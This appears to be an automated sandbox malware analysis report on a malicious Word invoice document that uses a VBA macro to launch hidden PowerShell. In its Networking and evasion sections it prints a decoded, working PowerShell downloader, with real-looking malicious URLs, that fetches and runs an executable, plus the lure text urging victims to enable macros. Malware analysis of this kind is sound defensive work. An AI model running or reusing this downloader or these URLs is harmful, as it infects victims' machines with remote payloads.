Windows Analysis Report
INV_PO_12172019EX.doc

Overview

General Information

Sample Name: INV_PO_12172019EX.doc
Analysis ID: 800690
MD5: 3b7fa78ebf399bb0230590bfec589fa7
SHA1: 199d4646fdbf9b5167d80ed71ce0ea406c40b018
SHA256: 5c2dc72128d235ecdca49e4026ec782cdce9021c5b46ebf841000bab5ebcc129

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Encrypted powershell cmdline option found
Very long command line found
Creates processes via WMI
Suspicious powershell command line found
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains an ObjectPool stream indicating possible embedded files or OLE objects
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

Source: INV_PO_12172019EX.doc ReversingLabs: Detection: 29%
Source: INV_PO_12172019EX.doc Virustotal: Detection: 70%
Source: INV_PO_12172019EX.doc Avira: detected
Source: https://diagnostica-products.com/wp-admin/hio2u7w/PE Avira URL Cloud: Label: malware
Source: https://diagnostica-products.com/wp-admin/hio2u7w/ Avira URL Cloud: Label: malware
Source: http://amstaffrecords.com/individualApi/0/ Avira URL Cloud: Label: malware
Source: http://amstaffrecords.com/indivi Avira URL Cloud: Label: phishing
Source: http://amstaffrecords.com Avira URL Cloud: Label: phishing
Source: http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/ Avira URL Cloud: Label: malware
Source: http://dev2.ektonendon.gr Avira URL Cloud: Label: phishing
Source: dev2.ektonendon.gr Virustotal: Detection: 7%
Source: amstaffrecords.com Virustotal: Detection: 8%
Source: INV_PO_12172019EX.doc Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic DNS query: name: amstaffrecords.com
Source: global traffic DNS query: name: foozoop.com
Source: global traffic DNS query: name: 7arasport.com
Source: global traffic DNS query: name: ww38.7arasport.com
Source: global traffic DNS query: name: dev2.ektonendon.gr
Source: global traffic DNS query: name: diagnostica-products.com

Networking

Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://amstaffrecords.com/individualApi/0/*http://foozoop.com/wp-content/Qxi7iVD/*http://7arasport.com/validatefield/gj/*http://
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://amstaffrecords.com/individualApi/0/*http://foozoop.com/wp-content/Qxi7iVD/*http://7arasport.com/validatefield/gj/*http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/*https://diagnostica-products.com/wp-admin/hio2u7w/
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://amstaffrecords.com/individualApi/0/*http://foozoop.com/wp-content/Qxi7iVD/*http://7arasport.com/validatefield/gj/*http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/*https://diagnostica-products.com/wp-admin/hio2u7w/PE
Source: powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in memory: $Npzfrnzbrtium='Vffuwyhyigiyq';$Esxtydjpk = '873';$Ylnjqsscmpm='Wylqaidkqa';$Imxfrxtapo=$env:userprofile+'\'+$Esxtydjpk+'.exe';$Rryipjfhd='Ytidncigle';$Uwudrmogjlosm=&('new-'+'objec'+'t') neT.WEBcLIeNT;$Gpckyscyaendz='http://amstaffrecords.com/individualApi/0/*http://foozoop.com/wp-content/Qxi7iVD/*http://7arasport.com/validatefield/gj/*http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/*https://diagnostica-products.com/wp-admin/hio2u7w/'."s`PLit"('*');$Ixiqogfikm='Bttxghvinomws';foreach($Mbcnzgspat in $Gpckyscyaendz){try{$Uwudrmogjlosm."DOW`NLO`AD`FIlE"($Mbcnzgspat, $Imxfrxtapo);$Hhtobffplgs='Xaympicu';If ((.('G'+'et-'+'Item') $Imxfrxtapo)."l`EnG`TH" -ge 27169) {[Diagnostics.Process]::"sT`ARt"($Imxfrxtapo);$Eidytkly='Ybqxcuvdiqn';break;$Lmqahjcwywtk='Gwauuhlz'}}catch{}}$Onogqbumo='Ldkeogsafxnj'
Source: global traffic HTTP traffic detected: GET /validatefield/gj/ HTTP/1.1
Host: 7arasport.com
Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /validatefield/gj/ HTTP/1.1
Host: ww38.7arasport.com
Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-bin/mTTCFmVe/ HTTP/1.1
Host: dev2.ektonendon.gr
Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 13.248.148.254
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
Date: Tue, 07 Feb 2023 17:14:15 GMT
Content-Type: text/html
Content-Length: 146
Connection: keep-alive
Server: nginx
Vary: Accept-Encoding
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Tue, 07 Feb 2023 17:14:15 GMT
Server: Apache
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Length: 315
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://7arasport.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://7arasport.com/validatefield/gj/
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://amstaffrecords.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://amstaffrecords.com/indivi
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.941139445.000000001B40F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://amstaffrecords.com/individualApi/0/
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dev2.ektonendon.gr
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foozoop.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foozoop.com/wp
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foozoop.com/wp-content/Qxi7iVD/
Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ja.com/he
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ww38.7arasport.com
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ww38.7arasport.com/validatefield/gj/
Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929114441.000000000024F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929114441.000000000024F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://diagnostica-products.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://diagnostica-products.com/wp-admin/hio2u7w/
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://diagnostica-products.com/wp-admin/hio2u7w/PE
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{98B5056E-1AC7-42C9-BDDC-599C5AB91B4A}.tmp
Source: unknown DNS traffic detected: queries for: amstaffrecords.com

System Summary

Source: Screenshot number: 4 Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing, please click Enable
Source: Screenshot number: 4 Screenshot OCR: Enable content button from the yellow bar above.
Source: Screenshot number: 8 Screenshot OCR: Enable content button from the yellow bar above
Source: Document image extraction number: 0 Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing, please click Enable
Source: Document image extraction number: 0 Screenshot OCR: Enable content button from the yellow bar above.
Source: Document image extraction number: 1 Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing, please click Enable
Source: Document image extraction number: 1 Screenshot OCR: Enable content button from the yellow bar above.
Source: unknown Process created: Commandline size = 2153
Source: INV_PO_12172019EX.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Vidpgeil, Function Document_open Name: Document_open
Source: ~DF413F6883B338D566.TMP.0.dr OLE, VBA macro line: Private Sub Document_open()
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFD6589A193BC4C172.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF413F6883B338D566.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: INV_PO_12172019EX.doc OLE indicator, ObjectPool: true
Source: INV_PO_12172019EX.doc OLE indicator, VBA macros: true
Source: ~DF413F6883B338D566.TMP.0.dr OLE indicator, VBA macros: true
Source: INV_PO_12172019EX.doc ReversingLabs: Detection: 29%
Source: INV_PO_12172019EX.doc Virustotal: Detection: 70%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -w hidden -en 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
Source: INV_PO_12172019EX.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\INV_PO_12172019EX.doc
Source: INV_PO_12172019EX.doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$V_PO_12172019EX.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6E5B.tmp
Source: classification engine Classification label: mal100.troj.evad.winDOC@2/19@6/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: INV_PO_12172019EX.doc OLE document summary: edited time not present or 0
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr OLE document summary: edited time not present or 0
Source: ~DFD6589A193BC4C172.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFD6589A193BC4C172.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFD6589A193BC4C172.TMP.0.dr OLE document summary: edited time not present or 0
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DF413F6883B338D566.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DF413F6883B338D566.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DF413F6883B338D566.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\system32\MSFTEDIT.DLL
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -w hidden -en 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

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 264 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: unknown Process created: Base64 decoded $Npzfrnzbrtium='Vffuwyhyigiyq';$Esxtydjpk = '873';$Ylnjqsscmpm='Wylqaidkqa';$Imxfrxtapo=$env:userprofile+'\'+$Esxtydjpk+'.exe';$Rryipjfhd='Ytidncigle';$Uwudrmogjlosm=&('new-'+'objec'+'t') neT.WEBcLIeNT;$Gpckyscyaendz='http://amstaffrecords.com/individualApi/0/*http://foozoop.com/wp-content/Qxi7iVD/*http://7arasport.com/validatefield/gj/*http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/*https://diagnostica-products.com/wp-admin/hio2u7w/'."s`PLit"('*');$Ixiqogfikm='Bttxghvinomws';foreach($Mbcnzgspat in $Gpckyscyaendz){try{$Uwudrmogjlosm."DOW`NLO`AD`FIlE"($Mbcnzgspat, $Imxfrxtapo);$Hhtobffplgs='Xaympicu';If ((.('G'+'et-'+'Item') $Imxfrxtapo)."l`EnG`TH" -ge 27169) {[Diagnostics.Process]::"sT`ARt"($Imxfrxtapo);$Eidytkly='Ybqxcuvdiqn';break;$Lmqahjcwywtk='Gwauuhlz'}}catch{}}$Onogqbumo='Ldkeogsafxnj'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -en jaboahaaegbmahiabgb6agiacgb0agkadqbtad0ajwbwagyazgb1ahcaeqboahkaaqbnagkaeqbxaccaowakaeuacwb4ahqaeqbkagoacabracaapqagaccaoaa3admajwa7acqawqbsag4aagbxahmacwbjag0acabtad0ajwbxahkababxageaaqbkagsacqbhaccaowakaekabqb4agyacgb4ahqayqbwag8apqakaguabgb2adoadqbzaguacgbwahiabwbmagkabablacsajwbcaccakwakaeuacwb4ahqaeqbkagoacabracsajwauaguaeablaccaowakafiacgb5agkacabqagyaaabkad0ajwbzahqaaqbkag4aywbpagcabablaccaowakafuadwb1agqacgbtag8azwbqagwabwbzag0apqamacgajwbuaguadwataccakwanag8aygbqaguaywanacsajwb0accakqagag4azqbuac4avwbfaeiaywbmaekazqboafqaowakaecacabjagsaeqbzagmaeqbhaguabgbkahoapqanaggadab0ahaaogavac8ayqbtahmadabhagyazgbyaguaywbvahiazabzac4aywbvag0alwbpag4azabpahyaaqbkahuayqbsaeeacabpac8amaavacoaaab0ahqacaa6ac8alwbmag8abwb6ag8abwbwac4aywbvag0alwb3ahaalqbjag8abgb0aguabgb0ac8auqb4agkanwbpafyaraavacoaaab0ahqacaa6ac8alwa3ageacgbhahmacabvahiadaauagmabwbtac8adgbhagwaaqbkageadablagyaaqblagwazaavagcaagavacoaaab0ahqacaa6ac8alwbkaguadgayac4azqbrahqabwbuaguabgbkag8abgauagcacgavagmazwbpac0aygbpag4alwbtafqavabdaeyabqbwagualwaqaggadab0ahaacwa6ac8alwbkagkayqbnag4abwbzahqaaqbjagealqbwahiabwbkahuaywb0ahmalgbjag8abqavahcacaatageazabtagkabgavaggaaqbvadiadqa3ahcalwanac4aigbzagaauabmagkadaaiacgajwaqaccakqa7acqasqb4agkacqbvagcazgbpagsabqa9accaqgb0ahqaeabnaggadgbpag4abwbtahcacwanadsazgbvahiazqbhagmaaaaoacqatqbiagmabgb6agcacwbwageadaagagkabgagacqarwbwagmaawb5ahmaywb5ageazqbuagqaegapahsadabyahkaewakafuadwb1agqacgbtag8azwbqagwabwbzag0algaiaeqatwbxagaatgbmae8ayabbaeqayabgaekababfaciakaakae0aygbjag4aegbnahmacabhahqalaagacqasqbtahgazgbyahgadabhahaabwapadsajabiaggadabvagiazgbmahaababnahmapqanafgayqb5ag0acabpagmadqanadsasqbmacaakaaoac4akaanaecajwaraccazqb0ac0ajwaraccasqb0aguabqanackaiaakaekabqb4agyacgb4ahqayqbwag8akqauaciababgaeuabgbhagaavabiaciaiaatagcazqagadianwaxadyaoqapacaaewbbaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoaigbzafqayabbafiadaaiacgajabjag0aeabmahiaeab0ageacabvackaowakaeuaaqbkahkadabragwaeqa9accawqbiaheaeabjahuadgbkagkacqbuaccaowbiahiazqbhagsaowakaewabqbxageaaabqagmadwb5ahcadabrad0ajwbhahcayqb1ahuaaabsahoajwb9ah0aywbhahqaywboahsafqb9acqatwbuag8azwbxagiadqbtag8apqanaewazabraguabwbnahmayqbmahgabgbqacca
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation